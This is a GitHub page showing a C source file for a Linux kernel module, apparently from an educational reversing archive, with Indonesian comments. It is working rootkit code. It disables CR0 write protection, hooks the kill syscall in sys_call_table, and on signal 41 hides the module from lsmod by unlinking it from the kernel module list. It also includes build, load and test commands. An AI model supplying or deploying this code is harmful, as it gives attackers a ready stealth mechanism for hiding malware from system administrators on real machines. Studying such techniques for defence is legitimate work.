-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcode.c
More file actions
185 lines (137 loc) · 3.89 KB
/
Copy pathcode.c
File metadata and controls
185 lines (137 loc) · 3.89 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
/*
Hide Module
Archive of Reversing.ID
Based on Linux Kernel Module Programming Guide
Tested on Linux Kernel 4.9.0-11-amd64 (Debian)
Menyembunyikan module dari daftar module.
Menggunakan syscall kill untuk memberikan perintah.
Build:
$ make
Module info:
$ modinfo code.ko
List module:
$ lsmod
Load:
$ insmod code.ko
Testing:
$ lsmod | grep code
$ kill -41 0
$ lsmod | grep code
$ kill -41 0
$ lsmod | grep code
Unload:
$ rmmod code
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/syscalls.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Reversing.ID");
MODULE_DESCRIPTION("Example of Char Driver (Linux)");
/*
Menyembunyikan module dengan menghilangkan module dari daftar module
yang dimuat oleh kernel. Ketika module tidak berada di dalam list,
maka operasi module (seperti unload module) tidak akan dapat dilakukan.
Lakukan penyembunyian ketika semua operasi telah dilakukan.
*/
/* ****************** Type Definition & Data Declaration ****************** */
/* menyimpan module sebelumnya di linked list */
static struct list_head * prev_module;
static short hidden = 0;
/*
signal yang akan dikirimkan oleh kill menjadi command bagi module.
gunakan signal yang termasuk ke dalam kategori real-time signal
dan tidak digunakan dalam library.
*/
enum
{
SIGHIDE = 41,
};
unsigned long cr0;
/* pointer ke syscall table */
static unsigned long *__sys_call_table;
/* pointer ke syscall original */
typedef asmlinkage int (*_o_kill_t ) (pid_t, int);
_o_kill_t ptr_kill;
/* ********************* Internal Functions Prototype ********************* */
void mod_hide (void);
void mod_show (void);
/* dapatkan alamat syscall table */
unsigned long * get_syscall_table_addr (void);
asmlinkage int new_kill (pid_t pid, int sig);
/* *************************** Helper Functions *************************** */
static inline void protect_memory(void)
{
write_cr0(cr0);
}
static inline void unprotect_memory(void)
{
write_cr0(cr0 & ~0x00010000);
}
/* ****************** Loadable Kernel Module Initialize ******************* */
static int __init code_init(void)
{
/* temukan alamat syscall table */
__sys_call_table = get_syscall_table_addr ();
if (! __sys_call_table)
return -1;
cr0 = read_cr0 ();
ptr_kill = (_o_kill_t) __sys_call_table[__NR_kill];
printk (KERN_INFO "Syscall Table at %p\n", __sys_call_table);
printk (KERN_INFO " __NR_kill at %p\n", (void*) __sys_call_table[__NR_kill]);
unprotect_memory();
__sys_call_table[__NR_kill] = (unsigned long) new_kill;
protect_memory();
printk (KERN_INFO "New address:\n");
printk (KERN_INFO " __NR_kill at %p\n", (void*) __sys_call_table[__NR_kill]);
return 0;
}
static void __exit code_exit(void)
{
unprotect_memory();
__sys_call_table[__NR_kill] = (unsigned long) ptr_kill;
protect_memory();
}
module_init(code_init);
module_exit(code_exit);
/* ******************* Internal Functions Implementation ******************* */
/*
Menyembunyikan module dengan menghapus module dari list.
*/
void mod_hide (void)
{
prev_module = THIS_MODULE->list.prev;
list_del(&THIS_MODULE->list);
hidden = 1;
}
/*
Menampilkan module dengan menyambungkan kembali module ke list.
*/
void mod_show (void)
{
list_add(&THIS_MODULE->list, prev_module);
hidden = 0;
}
unsigned long *
get_syscall_table_addr (void)
{
unsigned long * result;
result = (unsigned long *) kallsyms_lookup_name("sys_call_table");
return result;
}
asmlinkage int
new_kill (pid_t pid, int sig)
{
printk (KERN_INFO "revid: invoking kill %d with %d\n", pid, sig);
switch (sig)
{
case SIGHIDE:
if (hidden) mod_show();
else mod_hide();
break;
default:
return ptr_kill(pid, sig);
}
return 0;
}